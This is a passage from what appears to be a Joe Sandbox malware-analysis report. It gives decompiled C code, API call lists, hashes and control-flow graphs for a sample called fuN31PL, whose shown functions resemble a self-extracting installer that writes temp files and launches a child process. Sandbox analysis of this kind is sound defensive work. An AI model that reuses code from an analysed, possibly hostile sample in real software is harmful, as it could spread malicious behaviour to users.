                                                                                                                                                                                                                                              							 *0x1a88b0 = _t58;
                                                                                                                                                                                                                                              							_t37 = E001A6C3F(0x1a10b8, 0x1a10c4); // executed
                                                                                                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              								_t30 = 0xff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(0x1f);
                                                                                                                                                                                                                                              						L001A6FF4();
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t68 =  *0x1a88b0 - _t58; // 0x2
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_push(0x1a10b4);
                                                                                                                                                                                                                                              							_push(0x1a10ac);
                                                                                                                                                                                                                                              							L001A7202();
                                                                                                                                                                                                                                              							 *0x1a88b0 = 2;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                                                                                                              							 *0x1a88ac = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t71 =  *0x1a88b4;
                                                                                                                                                                                                                                              						if( *0x1a88b4 != 0 && E001A7060(_t71, 0x1a88b4) != 0) {
                                                                                                                                                                                                                                              							_t60 =  *0x1a88b4; // 0x0
                                                                                                                                                                                                                                              							 *0x1aa288(0, 2, 0);
                                                                                                                                                                                                                                              							 *_t60();
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                              						_t59 =  *_t25;
                                                                                                                                                                                                                                              						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t41 =  *_t59;
                                                                                                                                                                                                                                              							if(_t41 > 0x20) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							if(_t41 != 0) {
                                                                                                                                                                                                                                              								if(_t54 != 0) {
                                                                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                              										_t59 = _t59 + 1;
                                                                                                                                                                                                                                              										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              										_t41 =  *_t59;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t29 = 0xa;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(_t29);
                                                                                                                                                                                                                                              							_t30 = E001A2BFB(0x1a0000, 0, _t59); // executed
                                                                                                                                                                                                                                              							 *0x1a81e0 = _t30;
                                                                                                                                                                                                                                              							__eflags =  *0x1a81f8;
                                                                                                                                                                                                                                              							if( *0x1a81f8 == 0) {
                                                                                                                                                                                                                                              								exit(_t30); // executed
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *0x1a81e4;
                                                                                                                                                                                                                                              							if( *0x1a81e4 == 0) {
                                                                                                                                                                                                                                              								__imp___cexit();
                                                                                                                                                                                                                                              								_t30 =  *0x1a81e0; // 0x80070002
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              							goto L40;
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                              							if(_t41 == 0x22) {
                                                                                                                                                                                                                                              								__eflags = _t54;
                                                                                                                                                                                                                                              								_t15 = _t54 == 0;
                                                                                                                                                                                                                                              								__eflags = _t15;
                                                                                                                                                                                                                                              								_t54 = 0 | _t15;
                                                                                                                                                                                                                                              								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                              							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                              							__eflags = _t26;
                                                                                                                                                                                                                                              							if(_t26 != 0) {
                                                                                                                                                                                                                                              								_t59 = _t59 + 1;
                                                                                                                                                                                                                                              								__eflags = _t59;
                                                                                                                                                                                                                                              								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t59 = _t59 + 1;
                                                                                                                                                                                                                                              							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L40:
                                                                                                                                                                                                                                              					return E001A724D(_t30);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t58 = 1;
                                                                                                                                                                                                                                              				__eflags = 1;
                                                                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x001a6a60
                                                                                                                                                                                                                                              0x001a6a6a
                                                                                                                                                                                                                                              0x001a6a6c
                                                                                                                                                                                                                                              0x001a6a71
                                                                                                                                                                                                                                              0x001a6a78
                                                                                                                                                                                                                                              0x001a6a7f
                                                                                                                                                                                                                                              0x001a6a85
                                                                                                                                                                                                                                              0x001a6a8e
                                                                                                                                                                                                                                              0x001a6a91
                                                                                                                                                                                                                                              0x001a6a93
                                                                                                                                                                                                                                              0x001a6a9c
                                                                                                                                                                                                                                              0x001a6aa2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6aa6
                                                                                                                                                                                                                                              0x001a6ab4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6aa8
                                                                                                                                                                                                                                              0x001a6aaa
                                                                                                                                                                                                                                              0x001a6aab
                                                                                                                                                                                                                                              0x001a6aab
                                                                                                                                                                                                                                              0x001a6abf
                                                                                                                                                                                                                                              0x001a6abf
                                                                                                                                                                                                                                              0x001a6ac5
                                                                                                                                                                                                                                              0x001a6ad1
                                                                                                                                                                                                                                              0x001a6ad7
                                                                                                                                                                                                                                              0x001a6b05
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6ad9
                                                                                                                                                                                                                                              0x001a6ad9
                                                                                                                                                                                                                                              0x001a6ae9
                                                                                                                                                                                                                                              0x001a6af0
                                                                                                                                                                                                                                              0x001a6af2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6af4
                                                                                                                                                                                                                                              0x001a6af4
                                                                                                                                                                                                                                              0x001a6afb
                                                                                                                                                                                                                                              0x001a6afb
                                                                                                                                                                                                                                              0x001a6af2
                                                                                                                                                                                                                                              0x001a6ac7
                                                                                                                                                                                                                                              0x001a6ac7
                                                                                                                                                                                                                                              0x001a6ac9
                                                                                                                                                                                                                                              0x001a6b0b
                                                                                                                                                                                                                                              0x001a6b0b
                                                                                                                                                                                                                                              0x001a6b11
                                                                                                                                                                                                                                              0x001a6b13
                                                                                                                                                                                                                                              0x001a6b18
                                                                                                                                                                                                                                              0x001a6b1d
                                                                                                                                                                                                                                              0x001a6b24
                                                                                                                                                                                                                                              0x001a6b24
                                                                                                                                                                                                                                              0x001a6b30
                                                                                                                                                                                                                                              0x001a6b39
                                                                                                                                                                                                                                              0x001a6b39
                                                                                                                                                                                                                                              0x001a6b3b
                                                                                                                                                                                                                                              0x001a6b42
                                                                                                                                                                                                                                              0x001a6b57
                                                                                                                                                                                                                                              0x001a6b5f
                                                                                                                                                                                                                                              0x001a6b65
                                                                                                                                                                                                                                              0x001a6b65
                                                                                                                                                                                                                                              0x001a6b67
                                                                                                                                                                                                                                              0x001a6b6c
                                                                                                                                                                                                                                              0x001a6b6e
                                                                                                                                                                                                                                              0x001a6b71
                                                                                                                                                                                                                                              0x001a6b74
                                                                                                                                                                                                                                              0x001a6b74
                                                                                                                                                                                                                                              0x001a6b79
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6b7d
                                                                                                                                                                                                                                              0x001a6b81
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6b83
                                                                                                                                                                                                                                              0x001a6b8c
                                                                                                                                                                                                                                              0x001a6b8d
                                                                                                                                                                                                                                              0x001a6b90
                                                                                                                                                                                                                                              0x001a6b90
                                                                                                                                                                                                                                              0x001a6b83
                                                                                                                                                                                                                                              0x001a6b81
                                                                                                                                                                                                                                              0x001a6b94
                                                                                                                                                                                                                                              0x001a6b98
                                                                                                                                                                                                                                              0x001a6ba2
                                                                                                                                                                                                                                              0x001a6b9a
                                                                                                                                                                                                                                              0x001a6b9a
                                                                                                                                                                                                                                              0x001a6b9a
                                                                                                                                                                                                                                              0x001a6ba3
                                                                                                                                                                                                                                              0x001a6bab
                                                                                                                                                                                                                                              0x001a6bb0
                                                                                                                                                                                                                                              0x001a6bb5
                                                                                                                                                                                                                                              0x001a6bbc
                                                                                                                                                                                                                                              0x001a6bbf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6bbf
                                                                                                                                                                                                                                              0x001a6c1e
                                                                                                                                                                                                                                              0x001a6c25
                                                                                                                                                                                                                                              0x001a6c27
                                                                                                                                                                                                                                              0x001a6c2d
                                                                                                                                                                                                                                              0x001a6c2d
                                                                                                                                                                                                                                              0x001a6c32
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6bc5
                                                                                                                                                                                                                                              0x001a6bc5
                                                                                                                                                                                                                                              0x001a6bc8
                                                                                                                                                                                                                                              0x001a6bcc
                                                                                                                                                                                                                                              0x001a6bce
                                                                                                                                                                                                                                              0x001a6bce
                                                                                                                                                                                                                                              0x001a6bd1
                                                                                                                                                                                                                                              0x001a6bd3
                                                                                                                                                                                                                                              0x001a6bd3
                                                                                                                                                                                                                                              0x001a6bd6
                                                                                                                                                                                                                                              0x001a6bda
                                                                                                                                                                                                                                              0x001a6be1
                                                                                                                                                                                                                                              0x001a6be3
                                                                                                                                                                                                                                              0x001a6be5
                                                                                                                                                                                                                                              0x001a6be5
                                                                                                                                                                                                                                              0x001a6be6
                                                                                                                                                                                                                                              0x001a6be6
                                                                                                                                                                                                                                              0x001a6be9
                                                                                                                                                                                                                                              0x001a6bea
                                                                                                                                                                                                                                              0x001a6bea
                                                                                                                                                                                                                                              0x001a6b74
                                                                                                                                                                                                                                              0x001a6c39
                                                                                                                                                                                                                                              0x001a6c3e
                                                                                                                                                                                                                                              0x001a6c3e
                                                                                                                                                                                                                                              0x001a6abe
                                                                                                                                                                                                                                              0x001a6abe
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001A7182
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetCurrentProcessId.KERNEL32 ref: 001A7191
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetCurrentThreadId.KERNEL32 ref: 001A719A
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetTickCount.KERNEL32 ref: 001A71A3
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: QueryPerformanceCounter.KERNEL32(?), ref: 001A71B8
                                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,001A72B8,00000058), ref: 001A6A7F
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 001A6AB4
                                                                                                                                                                                                                                              • _amsg_exit.MSVCRT ref: 001A6AC9
                                                                                                                                                                                                                                              • _initterm.MSVCRT ref: 001A6B1D
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 001A6B49
                                                                                                                                                                                                                                              • exit.KERNELBASE ref: 001A6BBF
                                                                                                                                                                                                                                              • _ismbblead.MSVCRT ref: 001A6BDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836923961-0
                                                                                                                                                                                                                                              • Opcode ID: c54f3d4c52b80ba2e24f28dea47713212a956e20bec181dc716c90fe1a3044bb
                                                                                                                                                                                                                                              • Instruction ID: 494101464eba052c236e12053e3c24a5a32f9f75a900e380e74153bbf26b314b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c54f3d4c52b80ba2e24f28dea47713212a956e20bec181dc716c90fe1a3044bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41DF7DA04225DFDB219B68DD087AE77A0FB4B720F69401AE841E36D0CF784D81CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 631 1a58c8-1a58d5 632 1a58d8-1a58dd 631->632 632->632 633 1a58df-1a58f1 LocalAlloc 632->633 634 1a5919-1a5959 call 1a1680 call 1a658a CreateFileA LocalFree 633->634 635 1a58f3-1a5901 call 1a44b9 633->635 639 1a5906-1a5910 call 1a6285 634->639 645 1a595b-1a596c CloseHandle GetFileAttributesA 634->645 635->639 644 1a5912-1a5918 639->644 645->639 646 1a596e-1a5970 645->646 646->639 647 1a5972-1a597b 646->647 647->644
                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E001A58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				signed char _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                                                                                                              				CHAR* _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                                                                                                              				_t23 = __ecx + 1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t6 =  *_t27;
                                                                                                                                                                                                                                              					_t27 = _t27 + 1;
                                                                                                                                                                                                                                              				} while (_t6 != 0);
                                                                                                                                                                                                                                              				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                                                                              					E001A1680(_t20, _t36, _t33);
                                                                                                                                                                                                                                              					E001A658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                              					_v8 = _t10;
                                                                                                                                                                                                                                              					LocalFree(_t20);
                                                                                                                                                                                                                                              					_t12 = _v8;
                                                                                                                                                                                                                                              					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						CloseHandle(_t12);
                                                                                                                                                                                                                                              						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					_t14 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x001a58cd
                                                                                                                                                                                                                                              0x001a58d1
                                                                                                                                                                                                                                              0x001a58d3
                                                                                                                                                                                                                                              0x001a58d5
                                                                                                                                                                                                                                              0x001a58d8
                                                                                                                                                                                                                                              0x001a58d8
                                                                                                                                                                                                                                              0x001a58da
                                                                                                                                                                                                                                              0x001a58db
                                                                                                                                                                                                                                              0x001a58e1
                                                                                                                                                                                                                                              0x001a58ed
                                                                                                                                                                                                                                              0x001a58f1
                                                                                                                                                                                                                                              0x001a591e
                                                                                                                                                                                                                                              0x001a592c
                                                                                                                                                                                                                                              0x001a5943
                                                                                                                                                                                                                                              0x001a594a
                                                                                                                                                                                                                                              0x001a594d
                                                                                                                                                                                                                                              0x001a5953
                                                                                                                                                                                                                                              0x001a5959
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a595b
                                                                                                                                                                                                                                              0x001a595c
                                                                                                                                                                                                                                              0x001a5963
                                                                                                                                                                                                                                              0x001a596c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5972
                                                                                                                                                                                                                                              0x001a5974
                                                                                                                                                                                                                                              0x001a597a
                                                                                                                                                                                                                                              0x001a597a
                                                                                                                                                                                                                                              0x001a596c
                                                                                                                                                                                                                                              0x001a58f3
                                                                                                                                                                                                                                              0x001a5901
                                                                                                                                                                                                                                              0x001a5906
                                                                                                                                                                                                                                              0x001a590b
                                                                                                                                                                                                                                              0x001a5910
                                                                                                                                                                                                                                              0x001a5910
                                                                                                                                                                                                                                              0x001a5918

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A58E7
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5943
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A594D
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A595C
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5963
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                              • API String ID: 747627703-3033780695
                                                                                                                                                                                                                                              • Opcode ID: 9ca721b982ce9abdf15ead47b69ec73590e47daebeb3b3e0522dcc14d935941f
                                                                                                                                                                                                                                              • Instruction ID: 3145e2f777e23e82b6665e72518a9de9f4a5dd3fb62495991c4d766a32449ec6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ca721b982ce9abdf15ead47b69ec73590e47daebeb3b3e0522dcc14d935941f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C811E2757042207BC7245F7AAC4DBAB7E9AEF8B374F100629F50AD7591CB709846C6A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 675 1a3fef-1a4010 676 1a410a-1a411a call 1a6ce0 675->676 677 1a4016-1a403b CreateProcessA 675->677 678 1a4041-1a406e WaitForSingleObject GetExitCodeProcess 677->678 679 1a40c4-1a4101 call 1a6285 GetLastError FormatMessageA call 1a44b9 677->679 681 1a4070-1a4077 678->681 682 1a4091 call 1a411b 678->682 691 1a4106 679->691 681->682 686 1a4079-1a407b 681->686 690 1a4096-1a40b8 CloseHandle * 2 682->690 686->682 689 1a407d-1a4089 686->689 689->682 692 1a408b 689->692 693 1a40ba-1a40c0 690->693 694 1a4108 690->694 691->694 692->682 693->694 695 1a40c2 693->695 694->676 695->691
                                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                                              			E001A3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v524;
                                                                                                                                                                                                                                              				long _v528;
                                                                                                                                                                                                                                              				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t20;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t45 = __edx;
                                                                                                                                                                                                                                              				_t20 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                              				_t39 = __ecx;
                                                                                                                                                                                                                                              				_t49 = 1;
                                                                                                                                                                                                                                              				_t22 = 0;
                                                                                                                                                                                                                                              				if(__ecx == 0) {
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return E001A6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                              					_t45 = 0x4c4;
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					_t49 = 0;
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t22 = _t49;
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                              				_t44 = _v528;
                                                                                                                                                                                                                                              				_t53 =  *0x1a8a28; // 0x0
                                                                                                                                                                                                                                              				if(_t53 == 0) {
                                                                                                                                                                                                                                              					_t34 =  *0x1a9a2c; // 0x0
                                                                                                                                                                                                                                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                              						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                              							 *0x1a9a2c = _t44;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A411B(_t34, _t44);
                                                                                                                                                                                                                                              				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                              				CloseHandle(_v544);
                                                                                                                                                                                                                                              				if(( *0x1a9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x001a3fef
                                                                                                                                                                                                                                              0x001a3ffa
                                                                                                                                                                                                                                              0x001a4001
                                                                                                                                                                                                                                              0x001a4008
                                                                                                                                                                                                                                              0x001a400a
                                                                                                                                                                                                                                              0x001a400b
                                                                                                                                                                                                                                              0x001a4010
                                                                                                                                                                                                                                              0x001a410a
                                                                                                                                                                                                                                              0x001a411a
                                                                                                                                                                                                                                              0x001a411a
                                                                                                                                                                                                                                              0x001a401c
                                                                                                                                                                                                                                              0x001a401d
                                                                                                                                                                                                                                              0x001a401e
                                                                                                                                                                                                                                              0x001a401f
                                                                                                                                                                                                                                              0x001a4033
                                                                                                                                                                                                                                              0x001a403b
                                                                                                                                                                                                                                              0x001a40ca
                                                                                                                                                                                                                                              0x001a40e9
                                                                                                                                                                                                                                              0x001a40f8
                                                                                                                                                                                                                                              0x001a4101
                                                                                                                                                                                                                                              0x001a4106
                                                                                                                                                                                                                                              0x001a4106
                                                                                                                                                                                                                                              0x001a4108
                                                                                                                                                                                                                                              0x001a4108
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4108
                                                                                                                                                                                                                                              0x001a4049
                                                                                                                                                                                                                                              0x001a405c
                                                                                                                                                                                                                                              0x001a4062
                                                                                                                                                                                                                                              0x001a4068
                                                                                                                                                                                                                                              0x001a406e
                                                                                                                                                                                                                                              0x001a4070
                                                                                                                                                                                                                                              0x001a4077
                                                                                                                                                                                                                                              0x001a407f
                                                                                                                                                                                                                                              0x001a4089
                                                                                                                                                                                                                                              0x001a408b
                                                                                                                                                                                                                                              0x001a408b
                                                                                                                                                                                                                                              0x001a4089
                                                                                                                                                                                                                                              0x001a4077
                                                                                                                                                                                                                                              0x001a4091
                                                                                                                                                                                                                                              0x001a409c
                                                                                                                                                                                                                                              0x001a40a8
                                                                                                                                                                                                                                              0x001a40b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a40c2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a40c2

                                                                                                                                                                                                                                              APIs
